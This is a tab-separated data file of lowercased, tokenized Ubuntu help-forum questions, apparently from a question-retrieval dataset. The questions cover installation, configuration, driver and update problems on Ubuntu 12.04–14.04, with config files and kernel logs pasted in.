458275	stuck on select drive while installing ubuntu 14.04	before , when i was using ubuntu 12.04 , i always installed ubuntu with wubi , but this time i was trying install ubuntu 14.04 , i heard that wubi is no more , so i made an ubuntu 14.04 installation disk , then rebooted , and tried to install ubuntu . the problem is i am confused about what to do , how to select the partitions in the ubuntu installer . currently i am using a 500gb hard drive , which has 4 partitions : 50gb ( windows 7 ) 30gb ( this is free , wondered to install ubuntu ) 400gb ( full with software and multimedia files ) 100mb ( disk boot ) i do n't know how to install , and there is so much confusing language and options , that i am worried , i do n't want the wrong partition to get formatted . : ( i only want to install ubuntu on the second partition ( 30gb ) . please help me . thanks in advance .
458276	installing ubuntu alongside windows 7 does n't work	so i want to install ubuntu alongside my windows 7 and i ca n't . if i install it from windows it works , but when i reboot my computer it just says something like put the disc in and reboot and then install it . when i go and install it from a disc it just shows the beginning of the installation ( the purple screen with the logo on the bottom ) and then my monitors do n't have any source anymore while my computer is still running . i have installed ubuntu on my laptop the same way but it worked . the one difference might be that the not working installation is being made on a computer with two hard drives . any type of help would be appreciated .
458280	squid : sibling configuration , peers stop using icp	i 'm trying to create a very simple configuration here : i have one origin server and i want two peer to be set as siblings . i would like the sibling to communicate and exchange info on their cache content to collaboratively send contents to each other ( and caching data from the origin server ) . i am facing trouble though . when i launch the squid instances at the two peers , i ca n't get them to work together : from what i saw in access.log , the siblings are not using icp queries , and therefore not communicating about their cache content ( sometimes , at the beginning of my tests i can see one or two icp queries ( in access.log ) between the two peers , then , they just stop talking ... ) . i 've tried with a lot of different files , such as .jpg .mpd .gif . i 've had one udp_hit ( on the requested peer ) and sibling_hit ( on the requesting peer ) once ( over all my tests ) and that 's all , i get hier_direct for the rest of my tests . i am using the configuration file depicted below ( with the cache_peer directive in the end ) any idea what 's wrong in my config ? i am really struggling with this and ca n't see what 's wrong here > _ < squid version : 3.8.8 # access controls # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - acl localnet src 10.0.0.0/8 # rfc1918 possible internal network acl localnet src 172.16.0.0/12 # rfc1918 possible internal network acl localnet src 192.168.0.0/16 # rfc1918 possible internal network acl ssl_ports port 443 acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect acl video urlpath_regex -i .m4s $ http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow localhost manager http_access allow localnet http_access deny all icp_access allow localnet icp_access allow localhost icp_access deny all # network options # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - http_port 3128 # memory cache options # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cache_mem 256 mb maximum_object_size_in_memory 2048 kb memory_replacement_policy lru # disk cache options # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cache_replacement_policy lru cache_dir ufs /var/spool/squid3 2000 16 256 minimum_object_size 0 kb maximum_object_size 40960 kb # logfile options # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - access_log /var/log/squid3/access.log squid cache_store_log /var/log/squid3/store.log # options for tuning the cache # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - refresh_pattern ^ftp : 1440 20 % 10080 refresh_pattern ^gopher : 1440 0 % 1440 refresh_pattern -i ( /cgi-bin/|\ ? ) 0 0 % 0 refresh_pattern ( release|packages ( .gz ) * ) $ 0 20 % 2880 refresh_pattern . 0 20 % 4320 refresh_pattern -i .mpd $ 1440 100 % 1440 override-expire override-lastmod reload-into-ims ignore-reload ignore-no-cache ignore-private range_offset_limit -1 # icp options # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - icp_port 3130 # options influencing request forwarding # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - prefer_direct off cache_peer 192.168.2.112 sibling 3128 3130 proxy-only allow-miss
458281	ubuntu 14.04 nautilus has no menu - file , edit etc . do n't exist	since ubuntu 13.04 , and now 13.10 and 14.04 , my nautilus ( files ) has no application menu . this means that i ca n't access edit > preferences and can only change preferences via dconf-editor , as the 'show hidden files ' option keeps turning itself on . no , it 's not hidden in the global menu , whether the global menu is disabled in settings or not . i 've spent hours searching google for an answer and tried every suggestion , including : reinstall nautilus , removing the ~/.config/nautilus and ~/.config/nautilus-actions folders ubuntu_menuproxy= nautilus installing the appmenu list of programs removing the appmenu list of programs can anyone help ?
458282	correct way to add a repo for an older ubuntu release	i 've just installed ubuntu 14.04 and i wanted to add apt-fast so i did the usual : sudo add-apt-repository ppa : apt-fast/stable but i got an error , and in order to make it work i finally edited : /etc/apt/sources.list.d/apt-fast-stable-trusty.list and changed from trusty for saucy and then , after an apt-get update , everything went fine i 'm just wondering if this is the right way to do it , if it could bring me any troubles , and if there 's a better way to manage these situations .
458283	wait until vpn connection is made before mounting	is there a way in /etc/fstab that i can wait for the vpn connection to be made , and then mount the network drives ?
458285	ubuntu 14.04 resume error after suspend	i recently updated my ubuntu from 12.04 to 14.04 in my dual boot ( windows 7 ) toshiba satellite laptop . after the update , whenever the laptop suspends for sometime , it fails to resume . when i try to resume the laptop , by selecting ubuntu from grub loader , the login screen appears for a moment goes black and continues this back and forth for a couple of times and eventually goes back to `` suspend '' . i have to hard boot the system to get into ubuntu . below i have attached first few lines of the crash report : problemtype : kerneloops annotation : this occured during a previous hibernate and prevented it from resuming properly . architecture : i386 date : wed apr 30 10:57:56 2014 distrorelease : ubuntu 14.04 executablepath : /usr/share/apport/apportcheckresume executabletimestamp : 1397576330 failure : hibernate/resume interpreterpath : /usr/bin/python3.4 package : linux-image-3.13.0-24-generic proccmdline : /usr/bin/python3 /usr/share/apport/apportcheckresume proccwd : / procenviron : term=linux path= ( custom , no user ) ... ..
458286	getting an error wrong fs type , bad option , bad superblock on ubuntushared	i have installed ubuntu 14.04 as guest os in virtual box and my base os is widnows8.1 pro . i am relatively new to ubuntu os when i am trying to share the files between host os to guest os i did the following things i have installed guest additions after that i set the shared folders and the given name as `` ubuntu-shared '' after that i have given the command sudo mount -t vboxsf ubuntushared /media/ubuntushared i am getting the following error [ sudo ] password for sudhakar : mount : wrong fs type , bad option , bad superblock on ubuntushared , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) in some cases useful info is found in syslog - try dmesg | tail or so sudhakar @ sudhakar-virtualbox : ~ $ dmesg | tail [ 27.609673 ] intel8x0 : measured clock 125841 rejected [ 27.968145 ] intel8x0_measure_ac97_clock : measured 55818 usecs ( 7680 samples ) [ 27.968145 ] intel8x0 : measured clock 137590 rejected [ 27.968145 ] intel8x0 : clocking to 48000 [ 29.853093 ] init : udev-fallback-graphics main process ( 913 ) terminated with status 1 [ 30.848121 ] init : plymouth-splash main process ( 996 ) terminated with status 1 [ 33.188179 ] vboxsf : successfully loaded version 4.3.10 ( interface 0x00010004 ) [ 34.944719 ] init : plymouth-stop pre-start process ( 1217 ) terminated with status 1 [ 753.448878 ] hrtimer : interrupt took 19272977 ns [ 1102.388151 ] sf_read_super_aux err=-22
458288	what happens if i delete a file while tar is processing it ?	i am attempting to backup my filesystem with the following command : tar -cvjf /fs.bz2 -- exclude=/fs.bz2 -- exclude=/proc -- exclude=/lost+found -- exclude=/mnt -- exclude=/sys / this command has been running , and outputing each file processed , and has progressed up to a certain 2 gb file named 20130601.tgz . i 've decided that i do n't need to keep this file , and so while tar was processing it , i deleted this file with rm . tar appears to still be processing the file as it has not outputed the next file to be processed , and the filesize of the bzip2 file continues to grow . previously , tar seems to recognise that a file had changed while it was edited and had said so , and continued on to the next file . i 've also recreated the file with the following command : echo hello > 20130601.tgz three related questions : why did it not recognise that it has been modified this time ? do i need to start my tar command again ? if it is still processing the same file even though i deleted it , where is it getting the contents of the file in order to process it ? edit : question number 1 and 2 are answered by the following output of my command : tar : /srv/www/nachtkriecher.com/backups/20130601.tgz : file changed as we read it question 3 still remains though ! what was it doing while i was waiting ?
458289	upgraging from 32bit x86 11.10 to 14.4	have installed 14.04 on lab 's single core atom based system and found that it ( by base load ) has incorporated most of the features which i have installed on my fujitsu s-series lifebook notebook ( centrino ) . can i upgrade the notebook from 32bit 11.10 to 32bit 14.4 without a complete reload ? i can clone it if i have to and make the attempt as a precaution since i 'm not sure where much of my documents ( stuff ) including apps related configuration etc . can be found . i 've been working with/using linux as my primary personal os since lindows came out while still being responsible for keeping assorted windows based iterations/failures/miss fires , etc . running at work and with family members to date . between lindows/linspire and ubuntu i worked with red hat , suse , puppy , dsl , and others , but have come to like ubuntu 's releases . i 've also been working with android based devices with the clean networking integration that linux provides for file transfers , etc . usb based puppy and dsl provide embedded pc hardware checkout tools for my systems designs . thanks ubuntu team on your work ! dennis
458290	i ca n't even make a cd of 12.04	i have an old dell tower that is 13 years old . it has xp home on it . i have never worked with anything but windows systems . so i 'm basically a total greenie a cd is just under 700 mb . i used the infrarecorder and got the download on the disc , ran it and it was nothing but an error on every file . i tried a dvd made on a windows 7 machine . nothing.it wo n't recognize the dvd as a boot medium i 'm ready to trash it all , but no one wants to make a new computer for you without an os . i refuse to sucumb to win8 . i 've read enough to know that it 's a modified version of the vista junk from years back . is there a way to buy an installation cd from anywhere ? can i wipe my hard drive clean and start over ? i have all of my programs saved to a 8 gb stick . it 's either this or i erase everything on the computer but the os and use it only for internet access . 90 % of what i do is internet only .
458292	urbackup installation problem in ubuntu12.04	after ./configure i run make command but i got this error how to fix it ... libtool : link : ( cd `` .libs '' & & rm -f `` liburbackupserver.so '' & & ln -s `` liburbackupserver.so.0.0.0 '' `` liburbackupserver.so '' ) libtool : link : ar cru .libs/liburbackupserver.a dllmain.o stringtools.o os_functions_lin.o server.o server_get.o server_hash.o server_image.o sha2.o data.o fileclient.o tcpstack.o server_prepare_hash.o server_update.o server_status.o server_channel.o server_ping.o server_log.o escape.o server_writer.o bufmgr.o server_running.o server_cleanup.o server_settings.o server_update_stats.o helper.o json.o lastacts.o login.o progress.o salt.o templ.o users.o piegraph.o usage.o usagegraph.o status.o settings.o backups.o logs.o isimageready.o getimage.o google_chart.o download_client.o treediff.o treenode.o treereader.o chunkpatcher.o compressedpipe.o internetserviceconnector.o internetservicepipe.o md5.o settingslist.o fileclientchunked.o adler32.o server_archive.o filedownload.o shutdown.o snapshot_helper.o verify_hashes.o cleanup_cmd.o repair_cmd.o servercleanupdao.o mdb.o midl.o mdbfilecache.o databasefilecache.o create_files_cache.o filecache.o sqlitefilecache.o livelog.o libtool : link : ranlib .libs/liburbackupserver.a libtool : link : ( cd `` .libs '' & & rm -f `` liburbackupserver.la '' & & ln -s `` ../liburbackupserver.la '' `` liburbackupserver.la '' ) make [ 3 ] : leaving directory `/home/spat/downloads/urbackup-server-1.3.2/urbackupserver' make [ 2 ] : leaving directory `/home/spat/downloads/urbackup-server-1.3.2/urbackupserver' make [ 1 ] : leaving directory `/home/spat/downloads/urbackup-server-1.3.2' spat @ spat-oem : ~/downloads/urbackup-server-1.3.2 $
458293	problem installing 3g module huawei em770w	i have an acer 1420p running ubuntu 14.04 lts with a 3g module huawei em770w embedded . is there any way to get the module working ? thanks in advance . best regards , p .
458296	ca n't install updates by software updater	i have installed ubuntu 14.04 some days ago . now i am trying to update software using software updater , but it stops at : reading database i ran some commands on reading some websites , this is what i get as errors , please help : $ sudo apt-get update & & sudo apt-get upgrade e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? $ ps -ef | grep apt root 2206 1 0 17:56 ? 00:00:05 /usr/bin/python3 /usr/sbin/aptd root 2347 2206 2 17:56 pts/12 00:00:16 /usr/bin/python3 /usr/sbin/aptd root 2583 2347 0 17:57 pts/22 00:00:00 /usr/bin/dpkg -- status-fd 52 -- unpack -- auto-deconfigure /var/cache/apt/archives/dpkg_1.17.5ubuntu5.1_i386.deb sp 2948 2899 0 18:06 pts/24 00:00:00 grep -- color=auto apt
458306	virtualbox with windows xp - am i vulnerable browsing ?	i use chrome browser in xp to prepare powerpoint presentations in office 2007 for university . libreoffice is less than satisfactory at my university . am i safe surfing net in chrome on xp in virtualbox under ubuntu 14.04 ?
458309	multi monitor issues after fresh install of ubuntu 14.04	i just performed a fresh install of ubuntu 14.04 . i have 3 nvidia quadro cards powering three monitors . i used nvidia-settings to enable the three monitors : *note : the forum will not let me post the image until i have at least `` 10 reputation '' . i do n't think the image is necessary for understanding , it just shows that all three monitors are enabled in the nvidia settings window . if you need it , i can pm it to you . after rebooting all three monitors are being used , but only the primary monitor has a desktop . i can move the mouse to the other two monitors just fine , but the mouse pointer turns into an 'x ' , and i am unable to drag windows to them . when i try to drag a window onto the other monitor , the desktop acts as if they are not there and tries to dock the window on that side of my primary monitor ( desktop ) . the monitors are black and display no unity launcher or anything . here is my xorg.conf file : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.117 ( buildmeister @ swio-display-x86-rhel47-01 ) tue nov 26 22:29:40 pst 2013 # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` acer '' modelname `` acer x223w '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor1 '' vendorname `` acer '' modelname `` acer x223w '' horizsync 0.0 - 0.0 vertrefresh 0.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor2 '' vendorname `` acer '' modelname `` acer x223w '' horizsync 0.0 - 0.0 vertrefresh 0.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro 600 '' busid `` pci:4:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 580 '' busid `` pci:5:0:0 '' endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 580 '' busid `` pci:9:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection if i look at system settings- > displays , only the primary monitor will show up , it will not detect the other displays . here is the output of : /usr/lib/nux/unity_support_test -- print opengl vendor string : nvidia corporation opengl renderer string : quadro 600/pcie/sse2 opengl version string : 4.2.0 nvidia 304.117 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes edit 05/06/2014 : after fighting with and learning about how x11 works over the last few days , i think i need to restate the question i have . i think xinerama is what i need to use , with this computer , i had it configured correctly on ubuntu 12.04 without any issues , but an update to unity broke everything ; so i upgraded to 14.04 . until i can replace x11 with mir or wayland , i would like to get xinerama to work with my current version of unity , which is 7.2.0 . when i enable xinerama in my xorg.conf , i am able to log in and can see the background on all three screens , but unity fails to load ; something fails with compiz . if i reboot unity , i am able to get the desktop to load and open gui applications , but i can not drag them to other monitors . if i try , they are not rendered on the other screens , although i am still able to interact with them and drag them back ( only by remembering where the mouse was when i drag released them ) . has anyone successfully gotten xinerama to work with multiple monitors and gpus with 3d acceleration and x11 support ? does anyone know of a workaround such as mosaic mode with an add-ons ? is there a good alternative to unity/x11 that is stable and supports multimonitor desktops ? does the nouveau driver support multi monitor better than the nvidia driver ? would upgrading to the newer nvidia drivers ( i have nvidia-current : 304.117 ) resolve these issues ?
458317	wireless not working on ubuntu 12.04 in hp pavillion g6 1201tx	earlier i had windows 7 but my laptop was not detecting my home wireless network so i decided to shift on ubuntu 12.04 but . now when i am tried to install ubuntu 12.04 on my hp pavilion g6 1201 tx it showed all wireless networks even my home network for just a minute or 2 then all the wireless signals disappeared . i think , now wireless is not working at all please help me out
458323	when starting emacs from menu , it is not obeying .xresources	i have emacs.font : inconsolata-13 in my .xresources ( and i have said xrdb -merge .xresources . i have even rebooted the computer . ) when i open emacs from the command line , it uses inconsolata . when i open emacs from the desktop menu , or from file browser ( `` open with '' ) , emacs does not use inconsolata as its font . ( but something that looks like dejavu sans mono ) . what the hell is going on ? i have ubuntu 13.10 and xubuntu desktop .
458325	usb modem dongle showing up error since 14.04 has installed	[ 13406.995807 ] bug : unable to handle kernel null pointer dereference at 0000000000000068 [ 13406.995822 ] ip : [ < ffffffffa048762f > ] usb_wwan_write+0x12f/0x2e0 [ usb_wwan ] [ 13406.995841 ] pgd 361ba067 pud 36bb6067 pmd 0 [ 13406.995851 ] oops : 0000 [ # 1 ] smp [ 13406.995858 ] modules linked in : qmi_wwan cdc_wdm usb_storage ppp_deflate bsd_comp ppp_async crc_ccitt nls_utf8 nls_iso8859_1 isofs pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) nfnetlink_queue nfnetlink_log nfnetlink cmac rmd160 crypto_null camellia_generic camellia_aesni_avx_x86_64 camellia_x86_64 cast6_avx_x86_64 cast6_generic cast5_avx_x86_64 cast5_generic cast_common deflate cts ctr gcm ccm serpent_avx_x86_64 serpent_sse2_x86_64 serpent_generic blowfish_generic blowfish_x86_64 blowfish_common twofish_generic twofish_avx_x86_64 twofish_x86_64_3way xts twofish_x86_64 twofish_common xcbc sha256_ssse3 sha512_ssse3 des_generic tunnel4 xfrm_algo snd_hda_codec_hdmi joydev nvidia ( pof ) dell_wmi hid_generic sparse_keymap dell_laptop dcdbas arc4 iwldvm uvcvideo mac80211 option intel_rapl videobuf2_vmalloc usb_wwan pl2303 videobuf2_memops x86_pkg_temp_thermal usbserial videobuf2_core usbhid intel_powerclamp videodev asix hid coretemp usbnet kvm_intel btusb kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw iwlwifi gf128mul glue_helper drm ablk_helper psmouse cryptd jmb38x_ms cfg80211 wmi memstick serio_raw video mac_hid snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc snd_seq_midi snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device snd_timer snd soundcore mei_me lpc_ich mei bnep rfcomm bluetooth parport_pc ppdev lp parport binfmt_misc mmc_block ahci libahci sdhci_pci r8169 sdhci mii [ last unloaded : tunnel6 ] [ 13406.996053 ] cpu : 2 pid : 991 comm : modemmanager tainted : pf o 3.13.0-24-generic # 46-ubuntu [ 13406.996059 ] hardware name : dell inc. dell system xps l702x/03rg89 , bios a17 02/22/2012 [ 13406.996064 ] task : ffff88022f5b97f0 ti : ffff8800b97e8000 task.ti : ffff8800b97e8000 [ 13406.996069 ] rip : 0010 : [ < ffffffffa048762f > ] [ < ffffffffa048762f > ] usb_wwan_write+0x12f/0x2e0 [ usb_wwan ] [ 13406.996081 ] rsp : 0018 : ffff8800b97e9d58 eflags : 00010283 [ 13406.996085 ] rax : 0000000000000000 rbx : 0000000000000001 rcx : 0000000000000001 [ 13406.996089 ] rdx : 0000000000000000 rsi : 0000000000220020 rdi : 0000000000000202 [ 13406.996093 ] rbp : ffff8800b97e9dd0 r08 : 0000000000000000 r09 : 0000000000000000 [ 13406.996097 ] r10 : 0000000000000011 r11 : 0000000000000293 r12 : 0000000000001000 [ 13406.996100 ] r13 : 0000000000000000 r14 : 0000000000000000 r15 : ffff88022ff72800 [ 13406.996105 ] fs : 00007f8528ff3840 ( 0000 ) gs : ffff88023de80000 ( 0000 ) knlgs:0000000000000000 [ 13406.996109 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 [ 13406.996113 ] cr2 : 0000000000000068 cr3 : 0000000036b13000 cr4 : 00000000000407e0 [ 13406.996116 ] stack : [ 13406.996120 ] ffff880161a64ae8 ffff88022ff72800 00000001814498d9 ffff88022ff72890 [ 13406.996130 ] dead000000100100 ffff880161a64800 00001c047e31fe28 ffff88007d483400 [ 13406.996137 ] ffff88022ff72880 ffff88022eecbe40 ffff88007e31fc00 ffff880161a64800 [ 13406.996145 ] call trace : [ 13406.996164 ] [ < ffffffffa047796d > ] serial_write+0x4d/0xb0 [ usbserial ] [ 13406.996176 ] [ < ffffffff814453a6 > ] n_tty_write+0x166/0x4e0 [ 13406.996189 ] [ < ffffffff8109a790 > ] ? wake_up_state+0x20/0x20 [ 13406.996196 ] [ < ffffffff81441ef8 > ] tty_write+0x148/0x2a0 [ 13406.996204 ] [ < ffffffff81445240 > ] ? process_echoes+0x70/0x70 [ 13406.996213 ] [ < ffffffff811b9534 > ] vfs_write+0xb4/0x1f0 [ 13406.996221 ] [ < ffffffff811b9f69 > ] sys_write+0x49/0xa0 [ 13406.996230 ] [ < ffffffff8172663f > ] tracesys+0xe1/0xe6 [ 13406.996234 ] code : 04 0f 85 28 01 00 00 48 8b 45 b0 48 8b 00 48 8b 78 10 e8 95 a0 0b e1 85 c0 0f 88 bd 00 00 00 81 fb 00 10 00 00 41 bc 00 10 00 00 < 49 > 8b 7d 68 44 0f 4e e3 48 8b 75 c0 49 63 c4 48 89 c2 48 89 45 [ 13406.996310 ] rip [ < ffffffffa048762f > ] usb_wwan_write+0x12f/0x2e0 [ usb_wwan ] [ 13406.996321 ] rsp < ffff8800b97e9d58 > [ 13406.996324 ] cr2 : 0000000000000068 [ 13406.996339 ] -- - [ end trace ad76816459981a68 ] -- - [ 13482.423009 ] usb 2-1.2 : usb disconnect , device number 8 [ 13482.423493 ] option1 ttyusb7 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.423738 ] option1 ttyusb9 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.423987 ] option1 ttyusb8 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.425297 ] option1 ttyusb5 : option_instat_callback : error -108 [ 13482.425641 ] option1 ttyusb5 : gsm modem ( 1-port ) converter now disconnected from ttyusb5 [ 13482.425737 ] option 2-1.2:1.0 : device disconnected [ 13482.427753 ] option1 ttyusb7 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.428004 ] option1 ttyusb6 : option_instat_callback : error -108 [ 13482.428009 ] option1 ttyusb9 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.428260 ] option1 ttyusb8 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.432003 ] option1 ttyusb7 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.432248 ] option1 ttyusb9 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.432498 ] option1 ttyusb8 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.436260 ] option1 ttyusb7 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.436518 ] option1 ttyusb9 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 13482.436751 ] option1 ttyusb8 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 )
458329	nautilus shortcuts keyboard dependent of language ?	i need to do these shortcuts keyboards into a script : select all ( ctrl+a ) invert selection ( shift+ctrl+i ) reload ( ctrl+r ) my question is : are the nautilus shortcuts keyboard dependent of language ? thanks in advance !
458335	kde moves homerun launcher after application launchers	every time i login to kde , the homerun menu button is moved to the right of the application icons : the icon with the kubuntu logo is the homerun launcher . i can put it to the left side as often as i want - it gets moved back after every login .
458336	locked ubuntu screen - apps do not detect locked status	i use ubuntu 12.10 but i did not really like unity gui because of performance issues and total inability to easily customize launcher . so i switched to xubuntu , which is much faster but i have a problem , that our company messaging software is not able to detect when i lock the screen so it does not change my status to away . it works in unity , but does not in xfce nor in cinnamon which i am testing right now . is there any settings or command to make os properly announce that screen was locked ?
458339	windows arrangement after disconnecting and external display	i have a toshiba portege z830 64bit with ubuntu 12.04lts ( 3.2.0-58-generic ) . i have several workspaces as i like to have different workspaces for different tasks . when at the office or at home i usually work with an external display . the trouble starts whenever i have to disconnect the external display : all the windows move around the different workspaces . as it is a problem of compiz ( probably ) i would like to update it . however , i do not know how to update it via commands on the terminal or if it is possible at all from here ( it is not possible from the software centre ) .
458340	installing netinfo on ubuntu	i 'm using ubuntu 14.04 , i ca n't find any tips how to install netinfo module to work with network , i think it might be possible to do it in terminal , but i 'm confused . i 've tried to install .exe file for windows of netinfo , ubuntu has downloaded some additional files for opening windows related files , but still no result . probably i need to try to open file for mac os ? any ideas ?
458341	unity invisible when a fullscreen application is running	after a recent update i can no longer see the dash side bar if i also have an application running in fullscreen . i first noticed it when playing diablo 3 , but i later checked it with a video running in full screen as well . when i use the `` windows key+d '' ( alt+tab does n't work with d3 ) command it will show the desktop back ground and that 's it . but the side bar is still there as i can click on it and whatever i happen to click on does run . also if i right click on the desktop and the drop down menu pops out the side bar is visible for that moment . as soon as i click anywhere else so that the drop down menu is not there any more , it goes invisible again . i am very new to linux ( ~1 week ) , so i do n't know how to show you any logs or some other usefull information . if you need to see some of those please tell me how to show it to you .
458344	login takes long time when there 's no internet	i have noticed , after i upgraded to 14.04 , that when i have a poor wifi connection or the network is disabled from the the login screen , the resulting login can take over two minutes . if i have a good connection then it 's a few seconds . i have disabled any startup stuff that might need network , but even so just getting from login to desktop should n't stop to wait for the internet . any thoughts ? sudo tail /var/log/syslog login lagging : apr 30 16:32:38 cho kernel : [ 241.230119 ] [ < ffffffff810c7bc8 > ] ? __call_rcu_nocb_enqueue+0xa8/0xc0 apr 30 16:32:38 cho kernel : [ 241.230126 ] [ < ffffffff811ca091 > ] user_path_at+0x11/0x20 apr 30 16:32:38 cho kernel : [ 241.230136 ] [ < ffffffff811be2b0 > ] vfs_fstatat+0x50/0xa0 apr 30 16:32:38 cho kernel : [ 241.230143 ] [ < ffffffff8109d76b > ] ? account_user_time+0x8b/0xa0 apr 30 16:32:38 cho kernel : [ 241.230151 ] [ < ffffffff811be74f > ] sysc_newstat+0x1f/0x40 apr 30 16:32:38 cho kernel : [ 241.230163 ] [ < ffffffff81020d35 > ] ? syscall_trace_enter+0x145/0x250 apr 30 16:32:38 cho kernel : [ 241.230173 ] [ < ffffffff817265dc > ] ? tracesys+0x7e/0xe6 apr 30 16:32:38 cho kernel : [ 241.230181 ] [ < ffffffff811be99e > ] sys_newstat+0xe/0x10 apr 30 16:32:38 cho kernel : [ 241.230187 ] [ < ffffffff8172663f > ] tracesys+0xe1/0xe6 apr 30 16:34:31 cho sudo : pam_ecryptfs : pam_sm_authenticate : /home/xxxx is already mounted sudo tail /var/log/syslog login good apr 30 16:38:55 cho kernel : [ 40.810360 ] type=1400 audit ( 1398872335.618:72 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=3016 comm= '' apparmor_parser '' apr 30 16:38:55 cho colord : profile added : hp-officejet-pro-8500-a910-gray.. apr 30 16:38:55 cho colord : profile added : hp-officejet-pro-8500-a910-rgb.. apr 30 16:38:55 cho colord : device added : cups-hp-officejet-pro-8500-a910 apr 30 16:38:58 cho ntpd_intres [ 1437 ] : parent died before we finished , exiting apr 30 16:38:58 cho bluetoothd [ 571 ] : endpoint unregistered : sender=:1.38 path=/mediaendpoint/hfpag apr 30 16:38:58 cho bluetoothd [ 571 ] : endpoint unregistered : sender=:1.38 path=/mediaendpoint/hfphs apr 30 16:38:58 cho bluetoothd [ 571 ] : endpoint unregistered : sender=:1.38 